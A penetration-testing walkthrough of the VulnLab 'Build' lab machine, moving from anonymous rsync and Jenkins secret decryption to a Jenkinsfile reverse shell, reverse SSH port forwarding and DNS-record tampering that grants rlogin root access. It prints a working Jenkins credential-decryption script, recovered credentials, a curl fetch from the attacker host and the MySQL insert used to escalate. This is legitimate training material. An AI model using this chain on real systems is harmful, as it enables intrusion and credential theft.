Penetration Testing - VulnLab - Build
Enrique A.
CRTP | PNPT | ARTA | Security Engineer with 9 + years of experience in network penetration testing, AD testing, Linux Server Testing and web application security testing.
1. Nmap
Nmap scan report for 10.10.93.136
Host is up (0.046s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:21:73:e2:6b:96:cd:f9:13:11:af:40:c8:4d:d6:7f (ECDSA)
|_ 256 2b:5e:ba:f3:72:d3:b3:09:df:25:41:29:09:f4:7b:f5 (ED25519)
53/tcp open domain PowerDNS
| dns-nsid:
| NSID: pdns (70646e73)
|_ id.server: pdns
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
873/tcp open rsync (protocol version 31)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=625c852db700fc2b; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=IszbhqgEaLBy7YyFX_f9rUk8AZo6MTcxNjQ5OTAwNzkyNDQzNjQ1MA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 23 May 2024 21:16:47 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=4d099910a5ff2251; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=tOL4OdA_I96E2ILMUi8O6IRoqTU6MTcxNjQ5OTAxMzE3MTk0MTk1Ng; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 23 May 2024 21:16:53 GMT
|_ Content-Length: 0
3306/tcp filtered mysql
8081/tcp filtered blackice-icecap
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=5/24%Time=664FB240%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_git
SF:ea=625c852db700fc2b;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Coo
SF:kie:\x20_csrf=IszbhqgEaLBy7YyFX_f9rUk8AZo6MTcxNjQ5OTAwNzkyNDQzNjQ1MA;\x
SF:20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2023\x20May\x202024\x2021:16:47\x
SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"the
SF:me-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x
SF:20cup\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:
SF:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHR
SF:lYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3Rhcn
SF:RfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6L
SF:y9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5n
SF:Iiwic2l6ZXMiOiI1MTJ")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,1A4,"HTTP/1\.0\x20405\x20Me
SF:thod\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x2
SF:0GET\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x2
SF:0no-transform\r\nSet-Cookie:\x20i_like_gitea=4d099910a5ff2251;\x20Path=
SF:/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=tOL4OdA_I96E2IL
SF:MUi8O6IRoqTU6MTcxNjQ5OTAxMzE3MTk0MTk1Ng;\x20Path=/;\x20Max-Age=86400;\x
SF:20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\
SF:x20Thu,\x2023\x20May\x202024\x2021:16:53\x20GMT\r\nContent-Length:\x200
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.09 seconds
Most services require credentials to access them. Since we don’t have any, let's give Rsync a shot. Sometimes you can access it without needing any credentials.
2. RSYNC (port 873)
After checking the nmap results, ran rsync against the box.
rsync 10.10.93.136::
It showed me that there is a backup folder I can sync.
Then ran:
rsync -avz 10.10.93.136::Backup .
This will be allowing me to download the contents on that folder to my machine.
3. Uncompressing the contents of the file
tar -xvf jenkins.tar.gz
So doing some research, found what it is needed to decrypt jenkins passwords:
This part specifically:
How Jenkins stores credentials
To access and decrypt Jenkins credentials you need three files.
credentials.xml - holds encrypted credentials
hudson.util.Secret - decrypts credentials.xml entries, this file is itself encrypted
master.key - decrypts hudson.util.Secret
All three files are located inside Jenkins home directory:
$JENKINS_HOME/credentials.xml
$JENKINS_HOME/secrets/master.key
$JENKINS_HOME/secrets/hudson.util.Secret
In our case, found the files in the following paths. Also added config.xml that also has user "buildadm":
$JENKINS_HOME/secrets/master.key
$JENKINS_HOME/secrets/hudson.util.Secret
$JENKINS_HOME/users/users.xml
$JENKINS_HOME/jobs/build/config.xml
4. Cracking the password for user buildadm.
I am working with buildadm since I was unable to get the password for "admin" in the users.xml file. Only for buildadm in the config.xml
I used the following python script:
#!/usr/bin/env python3
import sys
import re
import base64
import os.path
from hashlib import sha256
from Crypto.Cipher import AES
# Constants
decryption_magic = b'::::MAGIC::::'
# Get the confidentiality key
def get_confidentiality_key(master_key_path, hudson_secret_path):
with open(master_key_path, 'r') as f:
master_key = f.read().encode('utf-8')
with open(hudson_secret_path, 'rb') as f:
hudson_secret = f.read()
if len(master_key) % 2 != 0 and master_key[-1:] == b'\n':
master_key = master_key[:-1]
if len(hudson_secret) % 2 != 0 and hudson_secret[-1:] == b'\n':
hudson_secret = hudson_secret[:-1]
return decrypt_confidentiality_key(master_key, hudson_secret)
# Decrypt the confidentiality key
def decrypt_confidentiality_key(master_key, hudson_secret):
derived_master_key = sha256(master_key).digest()[:16]
cipher_handler = AES.new(derived_master_key, AES.MODE_ECB)
decrypted_hudson_secret = cipher_handler.decrypt(hudson_secret)
if decryption_magic not in decrypted_hudson_secret:
return None
return decrypted_hudson_secret[:16]
# Decrypt secret with old format
def decrypt_secret_old_format(encrypted_secret, confidentiality_key):
cipher_handler = AES.new(confidentiality_key, AES.MODE_ECB)
decrypted_secret = cipher_handler.decrypt(encrypted_secret)
if decryption_magic not in decrypted_secret:
return None
return decrypted_secret.split(decryption_magic)[0]
# Decrypt secret with new format
def decrypt_secret_new_format(encrypted_secret, confidentiality_key):
iv = encrypted_secret[9:9+16]
cipher_handler = AES.new(confidentiality_key, AES.MODE_CBC, iv)
decrypted_secret = cipher_handler.decrypt(encrypted_secret[9+16:])
padding_value = decrypted_secret[-1]
if padding_value > 16:
return decrypted_secret
secret_length = len(decrypted_secret) - padding_value
return decrypted_secret[:secret_length]
# Decrypt secret
def decrypt_secret(encoded_secret, confidentiality_key):
if encoded_secret is None:
return None
try:
encrypted_secret = base64.b64decode(encoded_secret)
except base64.binascii.Error as error:
print('Failed base64 decoding the input with error: ' + str(error))
return None
if encrypted_secret[0] == 1:
return decrypt_secret_new_format(encrypted_secret, confidentiality_key)
else:
return decrypt_secret_old_format(encrypted_secret, confidentiality_key)
# Decrypt credentials file
def decrypt_credentials_file(credentials_file, confidentiality_key):
with open(credentials_file, 'r') as f:
data = f.read()
secrets = []
secrets += re.findall(r'<password>\{(.*?)\}</password>', data)
secrets = list(set(secrets))
for secret in secrets:
try:
decrypted_secret = decrypt_secret(secret, confidentiality_key)
if decrypted_secret:
print(decrypted_secret.decode('utf-8'))
except Exception as e:
print(e)
# Main function
if __name__ == '__main__':
if len(sys.argv) != 4:
print("Usage: python decrypt_jenkins.py <master.key> <hudson.util.Secret> <config.xml>")
sys.exit(1)
master_key_path = sys.argv[1]
hudson_secret_path = sys.argv[2]
config_xml_path = sys.argv[3]
confidentiality_key = get_confidentiality_key(master_key_path, hudson_secret_path)
if not confidentiality_key:
print('Failed decrypting confidentiality key')
exit(1)
decrypt_credentials_file(config_xml_path, confidentiality_key)
Running the script and decrypting the password:
└─$ python3 decrypt_jenkins.py /home/kali/Documents/VulnLab/Build/jenkins_configuration/secrets/master.key /home/kali/Documents/VulnLab/Build/jenkins_configuration/secrets/hudson.util.Secret /home/kali/Documents/VulnLab/Build/jenkins_configuration/jobs/build/config.xml
Git1234!
So finally we have a Username and Password : buildadm:Git1234!
Tried to log into ssh with this credentials but it was not working:
└─$ ssh [email protected]
The authenticity of host '10.10.93.136(10.10.93.136)' can't be established.
ED25519 key fingerprint is SHA256:DRkDvl6WtFaetkvOJlPoTULtH0qqBsSbLLmLVV0ts7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.93.136' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
5. Login in the panel
The credentials are working on this panel:
Below you can read Powered by Gitea which is an open-source, self-hosted Git service that allows users to manage their source code repositories. This means the full repository should be hosted here.
I would recommended to check this article: https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security#build-pipelines , to understand the concepts behind this attack.
Checking the website, found there is only "JenkinsFile"
Adding a reverse shell and setting up a listener on my attacking machine.
After hitting Commit Changes, I can see the connection established on my box (it takes a while )
Here we can get our user flag (user.txt), which I found weird since we are in the root folder... also, there is a .ssh folder and .rhosts that are always good to check.
root@5ac6c7d6fb8e:~# ls -al
ls -al
total 20
drwxr-xr-x 3 root root 4096 May 2 09:43 .
drwxr-xr-x 1 root root 4096 May 9 18:50 ..
lrwxrwxrwx 1 root root 9 May 1 14:37 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 17:37 .rhosts
drwxr-xr-x 2 root root 4096 May 1 16:05 .ssh
-rw------- 1 root root 37 May 1 14:29 user.txt
This seems to be a docker environment. Further checking on the files found the following:
6. Escaping the Docker Environment
Since this is a docker container we should escape to the host. Being logged as a local user means we should have access to local ports that were filtered in our first nmap result (port 3306 and 8081).
I cannot access port 8081 from the victim box since I would need a browser and for that I would need to forward ports in order to reach it with the browser on my kali box.
Failed to access MYSQL (3306) from the victim box:
So yes, it seems in this case it will be needed to start forwarding ports.
On this writeup, I mentioned there was an .ssh folder.. I tried those keys and they were not working.. so it is not possible to do it this way:
Kali Machine -> Victim Machine.
So I tried the other way around:
Victim Machine -> Kali.
For this purpose I generated some ssh keys and followed the following process:
1) Generating the keys:
2) Added the public key id_rsa.pub to my authorized_keys (/home/kali/.ssh/authorized_keys) and then transferred the id_rsa to the victim machine. To do this I shared it by running:
python -m http.server 9090
and then download the file with:
curl -O https://10.x.x.x:9090/id_rsa
3) Now it is time to forward the ports. At this point I noticed that since I added a password when generating the keys and my shell is not interactive, it will fail. To make this work and to have a fully interactive shell let's run:
export TERM=xterm
export SHELL=/bin/bash
script -qc /bin/bash /dev/null
The port forwarding was done with this command:
ssh -R 3306:10.10.93.136:3306 [email protected] -i /media/test/id_rsa
To access MYSQL, I access it through my Kali linux box since the port is already forwarded. I tried to log in with the buildadm user first but it was not working. I tried with 'root' and no password. and it works:
While exploring the databases, you will notice several default databases that are typically present in a MySQL installation. These include:
However, in this context, one database stands out: powerdnsadmin. Unlike the default databases listed above, powerdnsadmin is specific to the application or service being managed, which in this case is related to PowerDNS Admin.
7. PowerDNS Admin Database
powerdnsadmin: This database is specific to PowerDNS Admin, a web interface for managing PowerDNS. It typically contains tables related to the configuration and management of DNS records, users, and permissions within the PowerDNS ecosystem. This includes details such as domain records, user credentials, and other DNS-related configurations.
The presence of the powerdnsadmin database indicates that PowerDNS is being utilized on the system, and this database holds critical DNS configuration data. This data can be crucial for managing DNS zones and records, and it can provide insights into how the DNS services are configured and operated within the environment.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin |
| sys |
+--------------------+
5 rows in set (0.047 sec)
In summary, while the default databases (information_schema, mysql, performance_schema, and sys) are expected in any MySQL installation, the powerdnsadmin database is noteworthy as it is specific to the PowerDNS application.
Let's show all the tables in the DB:
MariaDB [powerdnsadmin]> show tables;
+-------------------------+
| Tables_in_powerdnsadmin |
+-------------------------+
| account |
| account_user |
| alembic_version |
| apikey |
| apikey_account |
| comments |
| cryptokeys |
| domain |
| domain_apikey |
| domain_setting |
| domain_template |
| domain_template_record |
| domain_user |
| domainmetadata |
| domains |
| history |
| records |
| role |
| sessions |
| setting |
| supermasters |
| tsigkeys |
| user |
+-------------------------+
23 rows in set (0.044 sec)
From the results we see some interesting data: users, domain and records. Let's check the contents:
MariaDB [powerdnsadmin]> select * from users
-> ;
ERROR 1146 (42S02): Table 'powerdnsadmin.users' doesn't exist
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq | admin | admin | [email protected] | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
MariaDB [powerdnsadmin]> select * from domain;
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| id | name | master | type | serial | notified_serial | last_check | dnssec | account_id |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| 1 | build.vl | [] | Native | 2024050201 | 0 | 0 | 0 | NULL |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
1 row in set (0.042 sec)
MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
As you can see, there is a user hash that probably can be decrypted with hashcat. Also, the entries for the records are showing some of the ones found also in /root/.rhosts. admin.build.vl does not have any entries on the mysql database but it is found on the .rhosts file:
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
root@5ac6c7d6fb8e:~#
The .rhosts file is used in Unix-based systems to define a list of remote hosts and users that are allowed to access the local system without a password. This file is part of the remote shell (rsh) suite of commands, which also includes rlogin and rcp. These commands enable users to log into another host, execute commands on a remote host, and copy files between hosts without needing to enter a password each time. This port was found also in our initial scan (514).
What this data is telling me is that it is possible to add a new value with the IP of my Kali box... probably to admin.build.vl since that is not included in the mysql database, then try rlogin to log into the server without any password if that record is on the machine hosting the docker container.
8. Getting Root
Running the following command in mysql:
INSERT INTO powerdnsadmin.records (domain_id, name, type, content, ttl, prio, disabled, ordername, auth) VALUES ((SELECT id FROM powerdnsadmin.domains WHERE name = 'build.vl'), 'admin.build.vl', 'A', '10.8.2.116', 60, 0, 0, NULL, 1);
Now my IP is added to the records.. if those records are in the machine that is hosting the docker container, I will be able to log into it with the root user:
We are now root and we can extract the last flag! :)
Conclusions
The "VulnLab: Build" machine provided a comprehensive learning experience, emphasizing the importance of exploring various attack vectors and thoroughly understanding the environment. Here are the key takeaways:
This has been an amazing experience and I totally recommend working on this machine!